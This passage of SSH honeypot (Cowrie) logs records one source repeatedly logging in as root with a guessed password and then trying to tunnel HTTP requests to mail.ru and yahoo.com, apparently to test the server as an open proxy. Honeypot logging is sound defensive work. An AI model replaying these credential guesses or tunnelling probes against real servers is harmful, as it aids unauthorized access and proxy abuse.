","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.066251Z","src_ip":"77.83.207.83","session":"6f628f3c22e5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.316944Z","src_ip":"77.83.207.83","session":"6f628f3c22e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30606,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:30606","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.368281Z","session":"6f628f3c22e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.418632Z","src_ip":"77.83.207.83","session":"6f628f3c22e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":12114,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:12114","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.560654Z","session":"6f628f3c22e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.610913Z","src_ip":"77.83.207.83","session":"6f628f3c22e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":4911,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:4911","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.752610Z","session":"6f628f3c22e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.803377Z","src_ip":"77.83.207.83","session":"6f628f3c22e5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.854815Z","src_ip":"77.83.207.83","session":"6f628f3c22e5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54182,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1095f195f75","protocol":"ssh","message":"New connection: 77.83.207.83:54182 (1.2.3.4:22) [session: b1095f195f75]","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.904667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.914705Z","src_ip":"77.83.207.83","session":"b1095f195f75"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.955785Z","src_ip":"77.83.207.83","session":"b1095f195f75"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.207436Z","src_ip":"77.83.207.83","session":"b1095f195f75"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23564,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23564","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.259067Z","session":"b1095f195f75"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.310739Z","src_ip":"77.83.207.83","session":"b1095f195f75"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":3956,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:3956","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.452728Z","session":"b1095f195f75"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.503020Z","src_ip":"77.83.207.83","session":"b1095f195f75"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":12076,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:12076","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.644706Z","session":"b1095f195f75"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.694979Z","src_ip":"77.83.207.83","session":"b1095f195f75"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.746012Z","src_ip":"77.83.207.83","session":"b1095f195f75"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54260,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcbec4034d76","protocol":"ssh","message":"New connection: 77.83.207.83:54260 (1.2.3.4:22) [session: fcbec4034d76]","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.796020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.796921Z","src_ip":"77.83.207.83","session":"fcbec4034d76"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:15.848180Z","src_ip":"77.83.207.83","session":"fcbec4034d76"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.102763Z","src_ip":"77.83.207.83","session":"fcbec4034d76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15038,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15038","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.154537Z","session":"fcbec4034d76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.205617Z","src_ip":"77.83.207.83","session":"fcbec4034d76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":14891,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14891","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.349358Z","session":"fcbec4034d76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.400491Z","src_ip":"77.83.207.83","session":"fcbec4034d76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":864,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:864","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.545464Z","session":"fcbec4034d76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.596945Z","src_ip":"77.83.207.83","session":"fcbec4034d76"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.649095Z","src_ip":"77.83.207.83","session":"fcbec4034d76"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54350,"dst_ip":"1.2.3.4","dst_port":22,"session":"60ed53d5803a","protocol":"ssh","message":"New connection: 77.83.207.83:54350 (1.2.3.4:22) [session: 60ed53d5803a]","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.698411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.699368Z","src_ip":"77.83.207.83","session":"60ed53d5803a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.749481Z","src_ip":"77.83.207.83","session":"60ed53d5803a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:16.999966Z","src_ip":"77.83.207.83","session":"60ed53d5803a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14375,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14375","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.051367Z","session":"60ed53d5803a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.102532Z","src_ip":"77.83.207.83","session":"60ed53d5803a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10396,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10396","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.244573Z","session":"60ed53d5803a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.294846Z","src_ip":"77.83.207.83","session":"60ed53d5803a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":26238,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26238","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.436589Z","session":"60ed53d5803a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.486890Z","src_ip":"77.83.207.83","session":"60ed53d5803a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.537964Z","src_ip":"77.83.207.83","session":"60ed53d5803a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54451,"dst_ip":"1.2.3.4","dst_port":22,"session":"05dad923c5d6","protocol":"ssh","message":"New connection: 77.83.207.83:54451 (1.2.3.4:22) [session: 05dad923c5d6]","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.587105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.597272Z","src_ip":"77.83.207.83","session":"05dad923c5d6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.637974Z","src_ip":"77.83.207.83","session":"05dad923c5d6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.890724Z","src_ip":"77.83.207.83","session":"05dad923c5d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":30671,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:30671","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.942199Z","session":"05dad923c5d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:17.993478Z","src_ip":"77.83.207.83","session":"05dad923c5d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":19355,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:19355","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.137104Z","session":"05dad923c5d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.187729Z","src_ip":"77.83.207.83","session":"05dad923c5d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":27112,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:27112","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.329326Z","session":"05dad923c5d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.380138Z","src_ip":"77.83.207.83","session":"05dad923c5d6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.431979Z","src_ip":"77.83.207.83","session":"05dad923c5d6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54537,"dst_ip":"1.2.3.4","dst_port":22,"session":"76672d317525","protocol":"ssh","message":"New connection: 77.83.207.83:54537 (1.2.3.4:22) [session: 76672d317525]","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.481857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.482822Z","src_ip":"77.83.207.83","session":"76672d317525"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ec